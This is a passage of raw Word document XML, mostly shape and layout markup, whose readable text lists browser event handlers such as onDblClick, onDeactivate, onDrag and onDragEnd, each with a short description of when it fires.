                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1081" name="Group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070" cy="116205"/>
                          <a:chOff x="1930" y="-185"/>
                          <a:chExt cx="1082" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1082" name="Freeform 1084"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="-186"/>
                            <a:ext cx="1082" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2991 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1082"/>
                              <a:gd name="T2" fmla="+- 0 -3 -185"/>
                              <a:gd name="T3" fmla="*/ -3 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1082"/>
                              <a:gd name="T6" fmla="+- 0 -3 -185"/>
                              <a:gd name="T7" fmla="*/ -3 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1082"/>
                              <a:gd name="T10" fmla="+- 0 -3 -185"/>
                              <a:gd name="T11" fmla="*/ -3 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1082"/>
                              <a:gd name="T14" fmla="+- 0 -24 -185"/>
                              <a:gd name="T15" fmla="*/ -24 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1082"/>
                              <a:gd name="T18" fmla="+- 0 -27 -185"/>
                              <a:gd name="T19" fmla="*/ -27 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1082"/>
                              <a:gd name="T22" fmla="+- 0 -164 -185"/>
                              <a:gd name="T23" fmla="*/ -164 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1082"/>
                              <a:gd name="T26" fmla="+- 0 -185 -185"/>
                              <a:gd name="T27" fmla="*/ -185 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2991 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1082"/>
                              <a:gd name="T30" fmla="+- 0 -185 -185"/>
                              <a:gd name="T31" fmla="*/ -185 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3012 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1082"/>
                              <a:gd name="T34" fmla="+- 0 -164 -185"/>
                              <a:gd name="T35" fmla="*/ -164 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3012 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1082"/>
                              <a:gd name="T38" fmla="+- 0 -24 -185"/>
                              <a:gd name="T39" fmla="*/ -24 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2994 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1082"/>
                              <a:gd name="T42" fmla="+- 0 -3 -185"/>
                              <a:gd name="T43" fmla="*/ -3 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2991 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1082"/>
                              <a:gd name="T46" fmla="+- 0 -3 -185"/>
                              <a:gd name="T47" fmla="*/ -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2" h="183">
                                <a:moveTo>
                                  <a:pt x="106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061" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1082" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1082" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1064" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="106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Text Box 108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-186"/>
                            <a:ext cx="108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onDblClick()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82" o:spid="_x0000_s1350" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:-9.25pt;width:54.1pt;height:9.15pt;z-index:15787008;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,-185" coordsize="108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">
                <v:shape id="Freeform 1084" o:spid="_x0000_s1351" style="position:absolute;left:1930;top:-186;width:1082;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="108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YQsMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9F/wPYQRvNVuFsqxGaQVFsIdWvXgbNrOb&#10;pZvJksR19dc3hUJv83ifs1wPthU9+dA4VvAyzUAQl043XCs4n7bPOYgQkTW2jknBnQKsV6OnJRba&#10;3fiL+mOsRQrhUKACE2NXSBlKQxbD1HXEiauctxgT9LXUHm8p3LZylmWv0mLDqcFgRxtD5ffxahXU&#10;dvdut4cqNx9n9I/rZ5/PL5VSk/HwtgARaYj/4j/3Xqf5WT6D32/SC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qYQsMAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m1061,182l21,182r-3,l,161r,-3l,21,21,,1061,r21,21l1082,161r-18,21l1061,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1061,-3;21,-3;18,-3;0,-24;0,-27;0,-164;21,-185;1061,-185;1082,-164;1082,-24;1064,-3;1061,-3" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1083" o:spid="_x0000_s1352" type="#_x0000_t202" style="position:absolute;left:1930;top:-186;width:108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8lcQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP32vCMBB+F/Y/hBvszSZzIK4ziojCYDCs3cMeb83Z&#10;BptLbaJ2/70ZDHy7j+/nzZeDa8WF+mA9a3jOFAjiyhvLtYavcjuegQgR2WDrmTT8UoDl4mE0x9z4&#10;Kxd02cdapBAOOWpoYuxyKUPVkMOQ+Y44cQffO4wJ9rU0PV5TuGvlRKmpdGg5NTTY0bqh6rg/Ow2r&#10;by429vT5sysOhS3LV8Uf06PWT4/D6g1EpCHexf/ud5Pmq9kL/H2TTp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Z/JX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onDblClick()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787520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795020" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1078" name="Group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5020" cy="116205"/>
                          <a:chOff x="1930" y="167"/>
                          <a:chExt cx="1252" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1079" name="Freeform 1081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1252" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3161 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1252"/>
                              <a:gd name="T2" fmla="+- 0 349 167"/>
                              <a:gd name="T3" fmla="*/ 349 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1252"/>
                              <a:gd name="T6" fmla="+- 0 349 167"/>
                              <a:gd name="T7" fmla="*/ 349 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1252"/>
                              <a:gd name="T10" fmla="+- 0 349 167"/>
                              <a:gd name="T11" fmla="*/ 349 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1252"/>
                              <a:gd name="T14" fmla="+- 0 328 167"/>
                              <a:gd name="T15" fmla="*/ 328 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1252"/>
                              <a:gd name="T18" fmla="+- 0 325 167"/>
                              <a:gd name="T19" fmla="*/ 325 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1252"/>
                              <a:gd name="T22" fmla="+- 0 188 167"/>
                              <a:gd name="T23" fmla="*/ 188 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1252"/>
                              <a:gd name="T26" fmla="+- 0 167 167"/>
                              <a:gd name="T27" fmla="*/ 167 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3161 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1252"/>
                              <a:gd name="T30" fmla="+- 0 167 167"/>
                              <a:gd name="T31" fmla="*/ 167 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3182 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1252"/>
                              <a:gd name="T34" fmla="+- 0 188 167"/>
                              <a:gd name="T35" fmla="*/ 188 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3182 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1252"/>
                              <a:gd name="T38" fmla="+- 0 328 167"/>
                              <a:gd name="T39" fmla="*/ 328 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3164 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1252"/>
                              <a:gd name="T42" fmla="+- 0 349 167"/>
                              <a:gd name="T43" fmla="*/ 349 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3161 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1252"/>
                              <a:gd name="T46" fmla="+- 0 349 167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52" h="183">
                                <a:moveTo>
                                  <a:pt x="123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231" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1252" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1252" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1234" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123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" name="Text Box 108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1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onDeactivate()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9" o:spid="_x0000_s1353" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.35pt;width:62.6pt;height:9.15pt;z-index:15787520;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,167" coordsize="125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">
                <v:shape id="Freeform 1081" o:spid="_x0000_s1354" style="position:absolute;left:1930;top:167;width:1252;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="125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FC5sIA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPS4vCMBC+C/6HMII3m+qCq9UouwuCPYmv+9iMbXeb&#10;SW2i1n9vhAVv8/E9Z75sTSVu1LjSsoJhFIMgzqwuOVdw2K8GExDOI2usLJOCBzlYLrqdOSba3nlL&#10;t53PRQhhl6CCwvs6kdJlBRl0ka2JA3e2jUEfYJNL3eA9hJtKjuJ4LA2WHBoKrOmnoOxvdzUKPsbt&#10;0a30eXM8petH+W3S4eU3Varfa79mIDy1/i3+d691mB9/TuH1TThB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YULmwgAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m1231,182l21,182r-3,l,161r,-3l,21,21,,1231,r21,21l1252,161r-18,21l1231,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1231,349;21,349;18,349;0,328;0,325;0,188;21,167;1231,167;1252,188;1252,328;1234,349;1231,349" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1080" o:spid="_x0000_s1355" type="#_x0000_t202" style="position:absolute;left:1930;top:167;width:125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ti4sYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvDMAyF74P9B6NCb6vdHUqX1i1lbDAYlKXpoUct&#10;VhPTWM5ir83+/XQY7Cbxnt77tN6OoVNXGpKPbGE+M6CI6+g8NxaO1evDElTKyA67yGThhxJsN/d3&#10;ayxcvHFJ10NulIRwKtBCm3NfaJ3qlgKmWeyJRTvHIWCWdWi0G/Am4aHTj8YsdEDP0tBiT88t1ZfD&#10;d7CwO3H54r/2nx/lufRV9WT4fXGxdjoZdytQmcb8b/67fnOCb5bCL9/IC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ti4s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onDeactivate()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(fires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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activeElement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changed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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current</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>object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another</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>object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parent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:sectPr w:rsidR="00AC7743">
          <w:pgSz w:w="11920" w:h="16860"/>
          <w:pgMar w:top="1360" w:right="1440" w:bottom="280" w:left="1460" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:num="3" w:space="708" w:equalWidth="0">
            <w:col w:w="420" w:space="40"/>
            <w:col w:w="845" w:space="94"/>
            <w:col w:w="7621"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1252"/>
          <w:tab w:val="left" w:pos="1253"/>
        </w:tabs>
        <w:spacing w:before="160"/>
        <w:ind w:left="1252" w:hanging="1063"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr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48568576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471170" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1075" name="Group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166"/>
                          <a:chExt cx="742" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1076" name="Freeform 1078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348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 742"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 742"/>
                              <a:gd name="T10" fmla="+- 0 348 166"/>
                              <a:gd name="T11" fmla="*/ 348 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 742"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 742"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 742"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 742"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2650 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 742"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2671 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 742"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2671 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 742"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2653 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 742"/>
                              <a:gd name="T42" fmla="+- 0 348 166"/>
                              <a:gd name="T43" fmla="*/ 348 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2650 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 742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" name="Text Box 107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onDrag()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6" o:spid="_x0000_s1356" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.3pt;width:37.1pt;height:9.15pt;z-index:-17630720;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,166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">
                <v:shape id="Freeform 1078" o:spid="_x0000_s1357" style="position:absolute;left:1930;top:166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mD68IA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP24rCMBB9F/yHMAu+yJrog5euUUQQdRGWrX7A0My2&#10;xWZSmljr3xthwbc5nOss152tREuNLx1rGI8UCOLMmZJzDZfz7nMOwgdkg5Vj0vAgD+tVv7fExLg7&#10;/1KbhlzEEPYJaihCqBMpfVaQRT9yNXHk/lxjMUTY5NI0eI/htpITpabSYsmxocCatgVl1/RmNeyP&#10;p8p3FzzYMy7G3z9XdWqHSuvBR7f5AhGoC2/xv/tg4nw1m8Lrm3iC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GYPrwgAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m720,182r-699,l18,182,,161r,-3l,21,21,,720,r21,21l741,161r-18,21l720,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="720,348;21,348;18,348;0,327;0,324;0,187;21,166;720,166;741,187;741,327;723,348;720,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1077" o:spid="_x0000_s1358" type="#_x0000_t202" style="position:absolute;left:1930;top:166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KscMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9C/0PYQq9aVIPardGEVEoCKXr9tDjdDPu&#10;BjeTdRN1/fdNQfA2j/c582XvGnGhLljPGl5HCgRx6Y3lSsN3sR3OQISIbLDxTBpuFGC5eBrMMTP+&#10;yjld9rESKYRDhhrqGNtMylDW5DCMfEucuIPvHMYEu0qaDq8p3DVyrNREOrScGmpsaV1TedyfnYbV&#10;D+cbe/r8/coPuS2KN8W7yVHrl+d+9Q4iUh8f4rv7w6T5ajqF/2/SC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eKs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onDrag()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(requires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>that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7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>drags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>object)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504"/>
          <w:tab w:val="left" w:pos="1506"/>
        </w:tabs>
        <w:ind w:hanging="1316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627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633095" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1072" name="Group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154"/>
                          <a:chExt cx="997" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1073" name="Freeform 1075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336 154"/>
                              <a:gd name="T3" fmla="*/ 336 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 997"/>
                              <a:gd name="T6" fmla="+- 0 336 154"/>
                              <a:gd name="T7" fmla="*/ 336 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 997"/>
                              <a:gd name="T10" fmla="+- 0 336 154"/>
                              <a:gd name="T11" fmla="*/ 336 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 997"/>
                              <a:gd name="T14" fmla="+- 0 315 154"/>
                              <a:gd name="T15" fmla="*/ 315 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 997"/>
                              <a:gd name="T18" fmla="+- 0 312 154"/>
                              <a:gd name="T19" fmla="*/ 312 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 997"/>
                              <a:gd name="T22" fmla="+- 0 175 154"/>
                              <a:gd name="T23" fmla="*/ 175 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 997"/>
                              <a:gd name="T26" fmla="+- 0 154 154"/>
                              <a:gd name="T27" fmla="*/ 154 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2906 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 997"/>
                              <a:gd name="T30" fmla="+- 0 154 154"/>
                              <a:gd name="T31" fmla="*/ 154 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2927 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 997"/>
                              <a:gd name="T34" fmla="+- 0 175 154"/>
                              <a:gd name="T35" fmla="*/ 175 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2927 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 997"/>
                              <a:gd name="T38" fmla="+- 0 315 154"/>
                              <a:gd name="T39" fmla="*/ 315 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2909 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 997"/>
                              <a:gd name="T42" fmla="+- 0 336 154"/>
                              <a:gd name="T43" fmla="*/ 336 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2906 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 997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Text Box 107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onDragEnd()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3" o:spid="_x0000_s1359" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:7.7pt;width:49.85pt;height:9.15pt;z-index:-17630208;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,154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">
                <v:shape id="Freeform 1075" o:spid="_x0000_s1360" style="position:absolute;left:1930;top:154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nX1MUA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywi9SN1YodaYVcQgeGgL1fY+Zsck&#10;JDsbs5uY/vtuQehtHu9zks1gatFT60rLCmbTCARxZnXJuYKv0/7pFYTzyBpry6Tghxxs1qOHBGNt&#10;b/xJ/dHnIoSwi1FB4X0TS+myggy6qW2IA3exrUEfYJtL3eIthJtaPkfRizRYcmgosKFdQVl17IyC&#10;9+tSpmldbScfb5fOdefv81zPlHocD9sVCE+D/xff3Qcd5keLOfx9E06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dfUxQAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m976,182r-955,l18,182,,161r,-3l,21,21,,976,r21,21l997,161r-18,21l976,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="976,336;21,336;18,336;0,315;0,312;0,175;21,154;976,154;997,175;997,315;979,336;976,336" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1074" o:spid="_x0000_s1361" type="#_x0000_t202" style="position:absolute;left:1930;top:154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UUxsQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9F/wPYQq91aRSbLs1ioiCIEjX7aHH6Wbc&#10;DW4m6ybq+u9NoeBtHu9zJrPeNeJMXbCeNbwMFQji0hvLlYbvYvX8DiJEZIONZ9JwpQCz6eBhgpnx&#10;F87pvIuVSCEcMtRQx9hmUoayJodh6FvixO195zAm2FXSdHhJ4a6RI6XG0qHl1FBjS4uaysPu5DTM&#10;fzhf2uP29yvf57YoPhRvxgetnx77+SeISH28i//da5Pmq7dX+Psmn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lFMb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onDragEnd()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(requires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>that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7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>drags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>object)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673"/>
          <w:tab w:val="left" w:pos="1674"/>
        </w:tabs>
        <w:spacing w:before="161"/>
        <w:ind w:left="1673" w:hanging="148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678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741045" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1069" name="Group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6205"/>
                          <a:chOff x="1930" y="167"/>
                          <a:chExt cx="1167" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1070" name="Freeform 1072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1167" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3076 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1167"/>
                              <a:gd name="T2" fmla="+- 0 349 167"/>
                              <a:gd name="T3" fmla="*/ 349 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1167"/>
                              <a:gd name="T6" fmla="+- 0 349 167"/>
                              <a:gd name="T7" fmla="*/ 349 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1167"/>
                              <a:gd name="T10" fmla="+- 0 349 167"/>
                              <a:gd name="T11" fmla="*/ 349 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1167"/>
                              <a:gd name="T14" fmla="+- 0 328 167"/>
                              <a:gd name="T15" fmla="*/ 328 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1167"/>
                              <a:gd name="T18" fmla="+- 0 325 167"/>
                              <a:gd name="T19" fmla="*/ 325 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1167"/>
                              <a:gd name="T22" fmla="+- 0 188 167"/>
                              <a:gd name="T23" fmla="*/ 188 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1167"/>
                              <a:gd name="T26" fmla="+- 0 167 167"/>
                              <a:gd name="T27" fmla="*/ 167 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3076 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1167"/>
                              <a:gd name="T30" fmla="+- 0 167 167"/>
                              <a:gd name="T31" fmla="*/ 167 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3097 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1167"/>
                              <a:gd name="T34" fmla="+- 0 188 167"/>
                              <a:gd name="T35" fmla="*/ 188 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3097 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1167"/>
                              <a:gd name="T38" fmla="+- 0 328 167"/>
                              <a:gd name="T39" fmla="*/ 328 h 183"/>
